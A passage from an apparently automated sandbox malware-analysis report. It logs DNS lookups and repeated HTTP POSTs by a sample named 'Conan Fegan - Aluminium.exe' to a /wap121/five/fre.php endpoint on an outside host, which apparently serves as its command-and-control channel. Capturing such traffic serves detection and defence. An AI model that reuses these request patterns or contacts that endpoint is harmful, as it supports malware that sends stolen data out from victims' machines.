                                          Feb 22, 2021 19:13:57.636794090 CET192.168.2.48.8.8.80xb50bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:58.918042898 CET192.168.2.48.8.8.80x189eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:00.227699995 CET192.168.2.48.8.8.80xd116Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:01.510381937 CET192.168.2.48.8.8.80x15ccStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:02.839185953 CET192.168.2.48.8.8.80xa955Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:04.114171028 CET192.168.2.48.8.8.80xadedStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:05.420623064 CET192.168.2.48.8.8.80x92dbStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:06.720895052 CET192.168.2.48.8.8.80xa19aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:08.022066116 CET192.168.2.48.8.8.80x9f0dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:09.293391943 CET192.168.2.48.8.8.80xeef4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:10.585911036 CET192.168.2.48.8.8.80xc87fStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:11.897115946 CET192.168.2.48.8.8.80xa87eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:13.196566105 CET192.168.2.48.8.8.80x7172Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:15.029618979 CET192.168.2.48.8.8.80xd6e2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:16.292236090 CET192.168.2.48.8.8.80x709aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:17.598541975 CET192.168.2.48.8.8.80x8a0Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:18.904568911 CET192.168.2.48.8.8.80x7e31Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:20.202388048 CET192.168.2.48.8.8.80x9814Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:21.463465929 CET192.168.2.48.8.8.80x9e5bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:22.777031898 CET192.168.2.48.8.8.80xc629Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:24.085288048 CET192.168.2.48.8.8.80x18abStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:25.337888002 CET192.168.2.48.8.8.80x973dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:26.620599985 CET192.168.2.48.8.8.80xe366Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:27.894123077 CET192.168.2.48.8.8.80xdaf0Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:29.153413057 CET192.168.2.48.8.8.80x969fStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:30.406487942 CET192.168.2.48.8.8.80x78c7Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:31.727921963 CET192.168.2.48.8.8.80xea94Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:33.020991087 CET192.168.2.48.8.8.80xe4e5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:34.320353031 CET192.168.2.48.8.8.80xe926Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:35.638341904 CET192.168.2.48.8.8.80x677aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:36.937913895 CET192.168.2.48.8.8.80xd1e2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:38.226160049 CET192.168.2.48.8.8.80x266aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:39.548564911 CET192.168.2.48.8.8.80x4299Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:40.861488104 CET192.168.2.48.8.8.80x8033Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:42.153589010 CET192.168.2.48.8.8.80xa184Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:43.443846941 CET192.168.2.48.8.8.80xa0afStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:44.731411934 CET192.168.2.48.8.8.80x532bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:46.037934065 CET192.168.2.48.8.8.80x6761Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:47.326683998 CET192.168.2.48.8.8.80xea29Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:48.652367115 CET192.168.2.48.8.8.80x6a3aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:49.946625948 CET192.168.2.48.8.8.80x3ab8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:51.218924046 CET192.168.2.48.8.8.80x65f4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:52.516993046 CET192.168.2.48.8.8.80xb1f8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:53.796204090 CET192.168.2.48.8.8.80xcbd8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:55.085910082 CET192.168.2.48.8.8.80x1512Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:56.344922066 CET192.168.2.48.8.8.80xf929Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Feb 22, 2021 19:13:01.708600998 CET8.8.8.8192.168.2.40xf2b4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:03.113802910 CET8.8.8.8192.168.2.40xc3d2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:04.329303026 CET8.8.8.8192.168.2.40xf658No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:05.698806047 CET8.8.8.8192.168.2.40xf93eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:07.065711021 CET8.8.8.8192.168.2.40xa7f6No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:09.033745050 CET8.8.8.8192.168.2.40x3a63No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:10.409897089 CET8.8.8.8192.168.2.40xddf9No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:11.784482002 CET8.8.8.8192.168.2.40x96c5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:13.098505974 CET8.8.8.8192.168.2.40x7723No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:14.410690069 CET8.8.8.8192.168.2.40xfb83No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:15.753534079 CET8.8.8.8192.168.2.40x4299No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:17.062061071 CET8.8.8.8192.168.2.40xdb49No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:18.400012016 CET8.8.8.8192.168.2.40x177cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:19.701555014 CET8.8.8.8192.168.2.40xbe65No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:20.985097885 CET8.8.8.8192.168.2.40x7c9dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:22.325532913 CET8.8.8.8192.168.2.40x8e2aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:23.659809113 CET8.8.8.8192.168.2.40x4b1cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:25.014542103 CET8.8.8.8192.168.2.40x9f7No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:26.614264011 CET8.8.8.8192.168.2.40x8dcaNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:27.933027983 CET8.8.8.8192.168.2.40xe56cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:29.239970922 CET8.8.8.8192.168.2.40xd2aeNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:30.543951035 CET8.8.8.8192.168.2.40x5c1dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:31.841751099 CET8.8.8.8192.168.2.40x73e3No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:33.143090010 CET8.8.8.8192.168.2.40xa1caNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:34.473993063 CET8.8.8.8192.168.2.40xc977No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:35.749298096 CET8.8.8.8192.168.2.40x43e1No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:37.036025047 CET8.8.8.8192.168.2.40x5256No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:38.343662024 CET8.8.8.8192.168.2.40xba7cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:39.638431072 CET8.8.8.8192.168.2.40x6371No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:40.957115889 CET8.8.8.8192.168.2.40x8eb6No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:42.242538929 CET8.8.8.8192.168.2.40x3351No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:43.532692909 CET8.8.8.8192.168.2.40x40f2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:44.793344975 CET8.8.8.8192.168.2.40xb103No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:46.095216990 CET8.8.8.8192.168.2.40x15f5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:47.418471098 CET8.8.8.8192.168.2.40xe9f4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:48.698528051 CET8.8.8.8192.168.2.40x8755No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:49.976164103 CET8.8.8.8192.168.2.40xa2eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:51.275183916 CET8.8.8.8192.168.2.40xb66aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:52.587490082 CET8.8.8.8192.168.2.40xaab4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:53.875464916 CET8.8.8.8192.168.2.40x94a5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:55.155000925 CET8.8.8.8192.168.2.40xfe8eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:56.423229933 CET8.8.8.8192.168.2.40xf40bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:57.693878889 CET8.8.8.8192.168.2.40xb50bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:58.975639105 CET8.8.8.8192.168.2.40x189eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:00.289978027 CET8.8.8.8192.168.2.40xd116No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:01.575758934 CET8.8.8.8192.168.2.40x15ccNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:02.888058901 CET8.8.8.8192.168.2.40xa955No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:04.163002968 CET8.8.8.8192.168.2.40xadedNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:05.469511986 CET8.8.8.8192.168.2.40x92dbNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:06.769843102 CET8.8.8.8192.168.2.40xa19aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:08.070943117 CET8.8.8.8192.168.2.40x9f0dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:09.352627993 CET8.8.8.8192.168.2.40xeef4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:10.638309002 CET8.8.8.8192.168.2.40xc87fNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:11.957366943 CET8.8.8.8192.168.2.40xa87eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:13.248152971 CET8.8.8.8192.168.2.40x7172No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:15.078545094 CET8.8.8.8192.168.2.40xd6e2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:16.344048023 CET8.8.8.8192.168.2.40x709aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:17.658497095 CET8.8.8.8192.168.2.40x8a0No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:18.961647034 CET8.8.8.8192.168.2.40x7e31No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:20.252974033 CET8.8.8.8192.168.2.40x9814No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:21.528162003 CET8.8.8.8192.168.2.40x9e5bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:22.828773975 CET8.8.8.8192.168.2.40xc629No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:24.138386965 CET8.8.8.8192.168.2.40x18abNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:25.386800051 CET8.8.8.8192.168.2.40x973dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:26.670846939 CET8.8.8.8192.168.2.40xe366No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:27.951292992 CET8.8.8.8192.168.2.40xdaf0No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:29.203366041 CET8.8.8.8192.168.2.40x969fNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:30.455286026 CET8.8.8.8192.168.2.40x78c7No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:31.792812109 CET8.8.8.8192.168.2.40xea94No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:33.069703102 CET8.8.8.8192.168.2.40xe4e5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:34.368915081 CET8.8.8.8192.168.2.40xe926No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:35.686975956 CET8.8.8.8192.168.2.40x677aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:36.989465952 CET8.8.8.8192.168.2.40xd1e2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:38.275090933 CET8.8.8.8192.168.2.40x266aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:39.597359896 CET8.8.8.8192.168.2.40x4299No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:40.910367966 CET8.8.8.8192.168.2.40x8033No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:42.204519987 CET8.8.8.8192.168.2.40xa184No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:43.493170977 CET8.8.8.8192.168.2.40xa0afNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:44.783324003 CET8.8.8.8192.168.2.40x532bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:46.086884975 CET8.8.8.8192.168.2.40x6761No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:47.375808954 CET8.8.8.8192.168.2.40xea29No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:48.703289032 CET8.8.8.8192.168.2.40x6a3aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:49.995392084 CET8.8.8.8192.168.2.40x3ab8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:51.267704964 CET8.8.8.8192.168.2.40x65f4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:52.566010952 CET8.8.8.8192.168.2.40xb1f8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:53.844918966 CET8.8.8.8192.168.2.40xcbd8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:55.140264988 CET8.8.8.8192.168.2.40x1512No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:56.395956993 CET8.8.8.8192.168.2.40xf929No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.ritcophysiotherapy.com.au

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449745203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:02.072160959 CET1419OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 190
                                          Connection: close
                                          Feb 22, 2021 19:13:02.801673889 CET1431INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.449747203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:03.456110954 CET1433OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 190
                                          Connection: close
                                          Feb 22, 2021 19:13:04.158847094 CET1446INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.449757203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:16.098573923 CET1548OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:16.800559998 CET1548INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.449758203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:17.407438040 CET1549OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:18.107852936 CET1550INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.449759203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:18.738996983 CET1551OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:19.442205906 CET1551INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.449760203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:20.041934967 CET1566OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:20.749983072 CET1575INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.449763203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:21.333542109 CET1576OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:22.060681105 CET1576INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.449764203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
